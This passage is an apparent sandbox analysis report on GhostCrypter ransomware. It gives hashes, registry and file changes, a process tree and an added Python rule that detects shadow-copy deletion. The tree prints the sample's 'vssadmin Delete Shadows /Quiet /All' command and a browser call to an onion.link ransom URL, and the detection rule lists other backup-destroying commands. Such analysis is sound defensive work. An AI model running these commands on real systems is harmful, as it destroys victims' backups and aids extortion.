Analysis
- max time kernel: 123s
- max time network: 119s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 02-03-2024 20:19
Behavioral tasks (sample, resource):
- behavioral1: 3da65a0e613fadcff41992bd4f74b7dc1e71f9cb542339679185f79de6503f0e.exe (win7-20240221-en)
- behavioral2: 3da65a0e613fadcff41992bd4f74b7dc1e71f9cb542339679185f79de6503f0e.exe (win10v2004-20240226-en)
- behavioral3: Ransomware/Alphabet.exe (win7-20240221-en)
- behavioral4: Ransomware/Alphabet.exe (win10v2004-20240226-en)
- behavioral5: Ransomware/Atom Payload Builder.exe (win7-20240221-en)
- behavioral6: Ransomware/Atom Payload Builder.exe (win10v2004-20240226-en)
- behavioral7: Ransomware/Cerber.exe (win7-20240221-en)
- behavioral8: Ransomware/Cerber.exe (win10v2004-20240226-en)
- behavioral9: Ransomware/EternalRocks.exe (win7-20240221-en)
- behavioral10: Ransomware/EternalRocks.exe (win10v2004-20240226-en)
- behavioral11: Ransomware/GLOBEIMPOSTER.exe (win7-20240215-en)
- behavioral12: Ransomware/GLOBEIMPOSTER.exe (win10v2004-20240226-en)
- behavioral13: Ransomware/GhostCrypter.exe (win7-20240221-en)
- behavioral14: Ransomware/GhostCrypter.exe (win10v2004-20240226-en)
- behavioral15: Ransomware/Golden Eyes - via unikey.exe (win7-20240221-en)
- behavioral16: Ransomware/Golden Eyes - via unikey.exe (win10v2004-20240226-en)
- behavioral17: Ransomware/Locky.exe (win7-20240221-en)
- behavioral18: Ransomware/Locky.exe (win10v2004-20240226-en)
- behavioral19: Ransomware/Matsnu.exe (win7-20240221-en)
- behavioral20: Ransomware/Matsnu.exe (win10v2004-20240226-en)
- behavioral21: Ransomware/Rex (ubuntu1804-amd64-20240226-en)
- behavioral22: Ransomware/ShellLocker.exe (win7-20240220-en)
- behavioral23: Ransomware/ShellLocker.exe (win10v2004-20240226-en)
- behavioral24: Ransomware/Unlock92.exe (win7-20240221-en)
- behavioral25: Ransomware/Unlock92.exe (win10v2004-20240226-en)
- behavioral26: Ransomware/cryptowall.exe (win7-20240221-en)
- behavioral27: Ransomware/cryptowall.exe (win10v2004-20240226-en)
- behavioral28: Ransomware/eda2.exe (win7-20240221-en)
- behavioral29: Ransomware/eda2.exe (win10v2004-20240226-en)
- behavioral30: Ransomware/jigsaw.exe (win7-20240220-en)
- behavioral31: Ransomware/jigsaw.exe (win10v2004-20240226-en)
- behavioral32: Ransomware/mamba.exe (win7-20240215-en)
General
- Target: Ransomware/GhostCrypter.exe
- Size: 87KB
- MD5: d60b0083605a9fb10b4d21005f1febd0
- SHA1: ed538f9dc4a7b58649d55b892e4a32cfb25b98a1
- SHA256: eae568e1a06b6dd762c92a8e0be5349c0c474ff429785fdad7d58083a10485de
- SHA512: 4c8b4e93685852cc4634f2cc2bd66ff86b2e133b9f6899441488b630569c26832eab07b08ced87b62031749969bb9c0d2e1fd229071213ed71eeaa9f27fb87cb
- SSDEEP: 1536:NcMqI3TJ38pY5GuncfTpgg5qKB3gg5bwFlG3zg4llJLmA+pVStv:Nck3TJ38pY5OfTpTpggSHGblzL8S
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Drops file in Drivers directory (3 IoCs)
  File opened for modification: C:\Windows\SysWOW64\drivers\gmreadme.txt (GhostCrypter.exe)
  File created: C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt (GhostCrypter.exe)
  File opened for modification: C:\Windows\SysWOW64\drivers\readme_liesmich_encryptor_raas.txt (GhostCrypter.exe)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AS10DxQsBBEHJDLi = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\GhostCrypter.exe\" /SkipReg" (GhostCrypter.exe)
- Drops file in System32 directory (64 IoCs)
- Drops file in Program Files directory (64 IoCs)
- Drops file in Windows directory (64 IoCs)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
1868 vssadmin.exe
-
Modifies Internet Explorer settings
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a70000000000200000000001066000000010000200000001b894eb600c16f332857d32a5a59460bb171d386d07065ffb0321f706dddbf9d000000000e8000000002000020000000506eff3025c6d89c71cf758ae14ef8386718178ae73b39b6cd6b21abf13ed67f200000006235f2ccfc31faf567ae56d801a45f8fc1ce699d067a03bb58dd7c37560f1fe34000000041185b3125a4fb3b60dc5c63ed3a5bec4f5b3ae478e4d09f7a688d63e132926c11319cae087ed96fa01d0d269ea3191df1554b0b3c7a2abc87b2cd290326cb50 iexplore.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0cb913edf6cda01 iexplore.exe
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value elided) iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{510B31E1-D8D2-11EE-9969-66DD11CD6629} = "0" iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415572699" iexplore.exe
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process
Token: SeBackupPrivilege 1248 vssvc.exe
Token: SeRestorePrivilege 1248 vssvc.exe
Token: SeAuditPrivilege 1248 vssvc.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process
740 iexplore.exe
-
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process
740 iexplore.exe
740 iexplore.exe
2176 IEXPLORE.EXE
2176 IEXPLORE.EXE
2176 IEXPLORE.EXE
2176 IEXPLORE.EXE
-
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target
PID 2972 wrote to memory of 2336 2972 GhostCrypter.exe 32
PID 2972 wrote to memory of 2336 2972 GhostCrypter.exe 32
PID 2972 wrote to memory of 2336 2972 GhostCrypter.exe 32
PID 2972 wrote to memory of 2336 2972 GhostCrypter.exe 32
PID 2972 wrote to memory of 740 2972 GhostCrypter.exe 34
PID 2972 wrote to memory of 740 2972 GhostCrypter.exe 34
PID 2972 wrote to memory of 740 2972 GhostCrypter.exe 34
PID 2972 wrote to memory of 740 2972 GhostCrypter.exe 34
PID 2336 wrote to memory of 1868 2336 cmd.exe 35
PID 2336 wrote to memory of 1868 2336 cmd.exe 35
PID 2336 wrote to memory of 1868 2336 cmd.exe 35
PID 2336 wrote to memory of 1868 2336 cmd.exe 35
PID 740 wrote to memory of 2176 740 iexplore.exe 38
PID 740 wrote to memory of 2176 740 iexplore.exe 38
PID 740 wrote to memory of 2176 740 iexplore.exe 38
PID 740 wrote to memory of 2176 740 iexplore.exe 38
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe"
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2972
    C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /Quiet /All
    - Suspicious use of WriteProcessMemory
    PID:2336
        C:\Windows\SysWOW64\vssadmin.exe
        vssadmin Delete Shadows /Quiet /All
        - Interacts with shadow copies
        PID:1868
    C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://idxcgov7x3dl552g.onion.link/vict?cust=8075ffe0db3cded725bdb4f67cc450bb834965a6&guid=ad04ce47-83ca-4cca-a79e-77cdc80ce41e&ever=2016-04-04_2&wver=0601b11d4336&fc=4008
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:740
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:740 CREDAT:275457 /prefetch:2
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx
        PID:2176
-
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1248
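The process tree above is the whole recovery-inhibition story in three lines: the sample (PID 2972) spawns cmd.exe (2336), which spawns vssadmin.exe (1868) with Delete Shadows /Quiet /All, and vssvc.exe (1248) then wakes up with backup/restore privileges to service the request. Note the image/command-line mismatch on cmd.exe: the command line asks for System32\cmd.exe, but the image that ran is SysWOW64\cmd.exe, because the sample is 32-bit and WoW64 file system redirection resolved the path. A detection that keys on the parent chain rather than on vssadmin.exe alone is what distinguishes this from an administrator running the same tool. The block below is an added example for this report, not tooling from the sandbox or code from the sample: it runs a shadow-copy tampering rule (MITRE ATT&CK T1490, Inhibit System Recovery) over process-creation records constructed to mirror this tree, walks the lineage to the root process, and rates the alert by where that root lives. The record field names are an assumed minimal schema rather than any specific EDR's, the benign "vssadmin list shadows" event is constructed as a negative case, and the wmic/wbadmin/bcdedit patterns are well-known equivalents from other ransomware, not something this report shows.

```python
"""
Attribute shadow-copy deletion (MITRE ATT&CK T1490, Inhibit System Recovery)
to the process that ultimately launched it, using process-creation telemetry.

Added example for this report, not tooling from the sandbox or code from the
sample. Event records are constructed to mirror the report's process tree
(2972 GhostCrypter.exe -> 2336 cmd.exe -> 1868 vssadmin.exe); the field names
are an assumed minimal schema, not a specific EDR's.
"""
import re
from dataclasses import dataclass

# Command lines that delete or starve shadow copies. The vssadmin form is the
# one this sample used; the others are well-known equivalents from other
# ransomware families, included so the rule is not sample-specific.
SHADOW_TAMPER_PATTERNS = [
    (r'vssadmin(\.exe)?"?\s+delete\s+shadows', "vssadmin delete shadows"),
    (r'vssadmin(\.exe)?"?\s+resize\s+shadowstorage', "vssadmin resize shadowstorage"),
    (r'wmic(\.exe)?"?\s+shadowcopy\s+delete', "wmic shadowcopy delete"),
    (r'wbadmin(\.exe)?"?\s+delete\s+catalog', "wbadmin delete catalog"),
    (r'bcdedit(\.exe)?"?.*recoveryenabled\s+no\b', "bcdedit recoveryenabled no"),
]


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int      # 0 when the parent is not in the capture
    image: str     # image path as the OS resolved it
    cmdline: str   # command line as passed by the parent


# Constructed from the report's process tree. cmd.exe's image is SysWOW64
# although its command line names System32: the 32-bit sample was subject to
# WoW64 file system redirection.
EVENTS = [
    ProcEvent(2972, 0, r"C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\Ransomware\GhostCrypter.exe"'),
    ProcEvent(2336, 2972, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /Quiet /All'),
    ProcEvent(1868, 2336, r"C:\Windows\SysWOW64\vssadmin.exe",
              "vssadmin Delete Shadows /Quiet /All"),
    ProcEvent(740, 2972, r"C:\Program Files\Internet Explorer\iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" http://idxcgov7x3dl552g.onion.link/vict'),
    ProcEvent(1248, 0, r"C:\Windows\system32\vssvc.exe", r"C:\Windows\system32\vssvc.exe"),
    # Constructed benign baseline (not in the report): an admin listing
    # shadows must not fire.
    ProcEvent(3100, 900, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
]


def match_shadow_tamper(cmdline: str):
    """Return the matching indicator label, or None. Case and whitespace are
    normalised so 'VSSADMIN  Delete   Shadows' still matches."""
    flat = " ".join(cmdline.split()).lower()
    for pattern, label in SHADOW_TAMPER_PATTERNS:
        if re.search(pattern, flat):
            return label
    return None


def lineage(pid, by_pid, max_depth=64):
    """Walk parent pointers from pid to the outermost process we know about.
    Child first, root last; the seen set bounds cycles from PID reuse."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """One alert per (root process, indicator). cmd.exe carries the vssadmin
    string and vssadmin.exe then runs, so both match; the deepest event is kept
    so the alert points at the process that actually did the deletion."""
    by_pid = {e.pid: e for e in events}
    best = {}
    for e in events:
        label = match_shadow_tamper(e.cmdline)
        if label is None:
            continue
        chain = lineage(e.pid, by_pid)
        root = chain[-1]
        # A LOLBin chain rooted outside C:\Windows is the ransomware-shaped
        # case; a root inside it may still be an admin tool and gets medium.
        severity = "medium" if root.image.lower().startswith("c:\\windows\\") else "high"
        alert = {
            "technique": "T1490",
            "indicator": label,
            "pid": e.pid,
            "image": e.image,
            "chain": [c.pid for c in chain],
            "root_pid": root.pid,
            "root_image": root.image,
            "severity": severity,
        }
        key = (root.pid, label)
        if key not in best or len(chain) > len(best[key]["chain"]):
            best[key] = alert
    return list(best.values())


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f'{a["severity"].upper()} {a["technique"]} {a["indicator"]}: '
              f'pid {a["pid"]} via {a["chain"]} rooted at {a["root_image"]}')
```

Against the constructed events this yields a single high-severity alert for PID 1868 with chain [1868, 2336, 2972] rooted at the sample in the user's Temp directory; the vssvc.exe start and the benign list command produce nothing. In production the parent walk should run against the endpoint's full process table, since a capture that starts after the parent exits will root the chain at cmd.exe and rate it medium.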
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize 1KB
MD5 ce910a3e445a752fd30f7e85e1ab7738
SHA1 f6c9beba56aca1f75f9d97ca1db6e727acffc01a
SHA256 3ff2f57e8fa2fdca0a0070fd87c98b03bd73793a6f77b95768a5e2dcd11570a4
SHA512 c239f4ec9632924fe06acfd839629606a100a3df52c554a22a3f7fa8041fa90bb1f7beff6a193b9a3c42c11d6019da7810864267432e4bf9ff740841c9ec0154
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 5403591d2f6f2479ed8ec43ca9ae1468
SHA1 181c47d6d3f62cad70104921ee9dac506c756359
SHA256 5408028382dae30785a53aceb74b3e7e1bf60e7d3142f1a1cfa62848ff00229e
SHA512 63a16b1fd414e597443e66ab6313826801bc75171756a77b21da9eab6e4eeb655eda447cc37b870d950b76f84a1724b1433bf9861a0aac5f78803134bfcdb265
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 f706f0e128412885b75019dacd34d00d
SHA1 c12dd0332403f77c2a97d093305800b80a0bb38f
SHA256 0bd2ed320cd14f85a3e73d1dcad9bb70dd47eaf3adeb8f174fa81a06c0f5b2c0
SHA512 38ad7048a0f8d1653e14be5a002748ca303542c6eb368972043b62ad0a55869626bc8f2d3b561093b67b1b94f711f22f1226239287f6521faeee4c62a7a4fa38
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 fbefbcbf9177e2fa34f96637d3c13d5a
SHA1 10f9c13a0645b6293be223a52b592583566925dd
SHA256 91aab2b121c74b1383bbaa724a8bbdeecbaa07208838fb3abfb69af646a0376b
SHA512 07407580e739efe749c1cf8539d7b3aaf4b44280df7890b4a2b8dba82254b1343042902dce4ca82d9028c0926d4c022e566fa9f635c7d1d84b2bbe6dfb85b3a3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 ee404f1ee9a9358c6ee2fe3cea451a5b
SHA1 c207bbaf7334ba9706905058a4a2157dab228dc4
SHA256 e9e2e2aaee644c5b7dcb69ab4f369a306a4563e79b5c052b9985807c60b30ed9
SHA512 338aa5f256e2308fb3e11a26cccce070dd0d58ec92ec1d9885150894ff3863fa58be089d3d1e5db70ca5911f11c5000fea5baaf9551083bb11ebf00cb3aca5ce
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 b9ffae5c20be4f548885a195799753b1
SHA1 0a8fd4607a6e5402e6a11981bad975fb8199ae06
SHA256 87a282df16235a8a7b71654dd44873bd04a65158f3f2f0db0ebec78259d92ad5
SHA512 de9d6e14e5cd245cf77900d62cd75a5f41a5021b57cc96e1e05640cc32356b6cd25e118d8c734cbef6610c2d48d9e1129b5e77f27ea02e0cb0e9a2ac5cac51e4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 7386ed05190bd59374dbd59ad6c080f6
SHA1 c02d536a171b339c0861d62f690787fde1133fbc
SHA256 ef9ea02ee7249af50ca1aeca8b289b2c905de4405d4a3ce720c2fbde00bf85af
SHA512 1c9d252c8277ec5333bcc1784f3c54d76d49fea7b14762ffe584b990c4a720bee25a6cb225ce296b58f7bfdfb4b28820a5938062382cc27cd1f5342d85be40ff
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 d42e6b892d624c4ee99d288400a2f789
SHA1 49c08a60bb31507a919c0dfb5ccbe335077ab92f
SHA256 f39282317e00d5261e355ee9e8f77a08fcc7548b4c985ea909abdba4f9b54641
SHA512 197d61984c7f069b0828ce97637f45d294ba8fe293410fc26f7a539d1d244485557f21029aafe7a5c693ab4387d59db65ef11a1b4c55b999220f28a96f372869
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 5ba47e99654e2afb3a0f240733891741
SHA1 04c578f3fecbc4069a10a75f8e0d17a5fbe823e4
SHA256 d2eba6a4f6c27f68fecd1f6eee8e1ca86d2edc92967bb6ca37a185ecc3785ecf
SHA512 f4e617d33aee4a642c56634b1c3f19e8d88a7bdf7c76725105486cccdf70d9022c1c75207fb08949c0425e5500e33061033ba77be6a7224b4cd9623d6265ce2d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 e4ad5798052acbf51a9628b8a5cb6b42
SHA1 3bed5ad3c68ea70bc88d0f4dcb10d2031fddb4e6
SHA256 0042a5b354f4bfc286bf6b6a311b04e645c4cab26c4731f41b9d893ad18c4be9
SHA512 9ce9eaec30c689b131f39e37dd86aa7526dcc6dead26c7b35b5ff4b512bafd3299e2d8acb15962d68398138ec5fbc890817ddebb4420ec477fa78ad7b4475002
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 31322ca01b658855ae898442fa578221
SHA1 9a2a8b204ac182ec7205f5cf396d5b45f8cdb38b
SHA256 5a1d8d11c9ba445b2105b01856fe95cd9312a22657beba9cf10d46ea3a26a4fb
SHA512 617e30b43da2ca7960cecfab147afb73d41dc6be28704399aca9d0379c0f373255b90f0a04d9f552fe3c139f7d5a1b994071e0113aaed5d5e28d2a2d587e8f46
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 8245095eb473b2ec9b94cd9f78b90477
SHA1 45973eba46c0619e39106b71dac045eb81f2b684
SHA256 de595349d5f5b80f64571410e654b998d49ddc870e73307c7b6254676b246211
SHA512 eb96421ab362fdf6eb898116afcadf4312a30b593618ecee709b853e6070a60639ddbfd32355fcec6b9078e58a4e43ed4df09efed5a5828b32514b2e5c3a749e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 d49f591c27fae1685534b37945540a00
SHA1 c2e18d466837eed1048aec89a9779b0d9427f49f
SHA256 7d3223fbfa62538ac7f4e641fd188c7a7704ecdd3b7811494493a2c7c3976f37
SHA512 d53c6c5a544af4448aa603d9418e33b3d5c1c09a96850295492a366833bc526eab80c24704111a3b0e14b261c42aa0d0297e3047bad4feb9c828f87b0eef3465
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 751a6186391d8d5c43b2ad8bdfd5f299
SHA1 14f01f6945bc7f2f8e475b6902cd689b0484c28b
SHA256 d3e99641824d4e7886b42fabf042c3a4725bf6af57445362840947774515d5d7
SHA512 19c7b2bd08b505c120c946bfac24355715afd38eb2b123412f2692c3cdac54879882f2db4ae411f81ea0c71302c3737cb4290c7fa6033e34df283afb68d6fe7e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 1e82c09996e2181c43445a486c3e8cae
SHA1 f23064195fc5f85e6aa7193148eed8f2f2afc923
SHA256 ff547f2f969b7fead659df791c8f0a56f03bf6ee9d5e2c2d166b8d9f40bd256a
SHA512 2644a08f26d180dfcdbf9262afd7ba987c1d9dbcbc1b2c117708508fb0bc48e4a23398423d28f968f08e93eee53ee32377229c6f64495294cc0f45250e89a9fa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 a6577a37b0b3256b65e546e422d6fc66
SHA1 7ee70cb1033a1b49bcb5d7e2283ed15149c5a91f
SHA256 10e68af588b838a4c1b697652f365ad578ade014d760596e529f6c3fb982791b
SHA512 12f2f2cd0bc2c0ed5a6020b7d6003b19aad6207e3ada1270fab99454c16db246eb50ff1a630d467f50e3ea938688f661f97d310691a21f0ea8be0036113576b6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 66059de2eb7e5ddda077b365ca341efa
SHA1 d2a47b2cd78e6427c2eadd6303dceab2d8bb71b1
SHA256 89d4143fdab61080076bdf1d4b7ce6c6c7c15be0073b5b5529ba8a7a8f1620ab
SHA512 ca2d2a8c18bf3a5bf5967fa9c77a0e944846de0d9b1de1448b80e64a17fd5dfc1c34d24ce9a8d5454fdf388be985eca65d3babba2ae8c807ca18f40bfa8ab126
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 b5a4dac59047f63959a876c10910896d
SHA1 c4db1fd59034b1e67d76da20562afa55a91e4be7
SHA256 3c1ad1b7502bf0eb624e38e36bcdd65567b8ea5b31d8de0c92c929676130d0e3
SHA512 c6e5851e1f1066c6bfbbade4d48e8683802d33701be0effb746fa1255856ceadd30cdf1809cd6edb4ae3018c5662e674fc9450f4deb3790700aa1ee216c1de24
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\favicon[1].ico
Filesize 4KB
MD5 6f6074198c0cb321bbd4e52b112e3dc8
SHA1 c521c24efd1c791596855f287b1360833d16c88b
SHA256 51f592b7154df28e7380cc2ea48dccc83cd867a99e242d217cb6fe98c73c2cb0
SHA512 aa1823a357ba7fca33e59a549e3579f2031c364c8e4d1ee6b8e078e556a5081069e629bfb9ed2e9642bff14e99bfe756fa7b9e10022ad5f8a8ffef5ace7ab35c
-
Filesize 65KB
MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize 67KB
MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize 175KB
MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
